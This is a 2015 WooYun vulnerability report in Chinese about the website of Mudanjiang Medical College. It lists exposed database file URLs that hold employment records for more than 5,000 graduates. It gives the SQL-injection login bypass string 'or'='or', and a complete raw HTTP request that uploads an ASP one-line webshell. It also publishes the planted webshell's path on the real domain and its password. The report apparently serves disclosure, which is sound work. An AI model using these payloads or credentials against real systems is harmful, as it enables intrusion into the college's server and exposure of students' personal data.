当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139690

漏洞标题:牡丹江医学院网站webshell

相关厂商:牡丹江医学院

漏洞作者: 老实先生

提交时间:2015-09-08 12:12

修复时间:2015-09-13 12:14

公开时间:2015-09-13 12:14

漏洞类型:后台弱口令

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

牡丹江医学院:http://www.mdjmu.edu.cn www.mdjmu.cn

详细说明:

扫描网站获得数据库地址:http://www.mdjmu.cn/jy/dapqcx/data/data2014.mdb
http://www.mdjmu.cn/jy/dapqcx/data/databack.mdb
http://www.mdjmu.cn/jy/dapqcx/data/data.mdb
http://www.mdjmu.cn/jy/dapqcx/data/data1.mdb
共计:5000多名学院毕业学生工作去向

1.GIF


----------------------------------------------------------------------
----------------------------------------------------------------------
通过弱口令 'or'='or' 登陆后台:http://www.mdjmu.cn/xxgkw/huizhi/adminlogin.asp

1后台.GIF


有上传 抓包上传(动力上传漏洞)获取 webshell

POST /xxgkw/huizhi/asp/Files.asp HTTP/1.1
Host: www.mdjmu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.mdjmu.cn/xxgkw/huizhi/asp/QuickUpload.htm
Cookie: ASPSESSIONIDACQSCBDQ=OIEDCFICDLPGECONBHPINHKD; SafeCode=7248; ASPSESSIONIDCAQQDADQ=JEFADDJCCNGDDAKLDBJBFBAI; ASPSESSIONIDACRRCBCR=FHKBFPKCDOMOIIIPLNIMLJFK; ASPSESSIONIDACRSCBCQ=IMEDGNLCLHFCKPKAIDAALLOO
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------10679881919841
Content-Length: 375
-----------------------------10679881919841
Content-Disposition: form-data; name="file"; filename="1.asp"
Content-Type: text/vnd.wap.wml
<%
re= request("wooyun")
if re <>"" then
execute re
response.end
end if
%>
-----------------------------10679881919841
Content-Disposition: form-data; name="title"
-----------------------------10679881919841--


捕获.GIF


----------------------------------------------------------------
webshell地址:http://www.mdjmu.cn/xxgkw/include/diy.asp
密码:zidi

漏洞证明:

2.GIF

修复方案:

你们懂

版权声明:转载请注明来源 老实先生@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-13 12:14

厂商回复:

最新状态:

暂无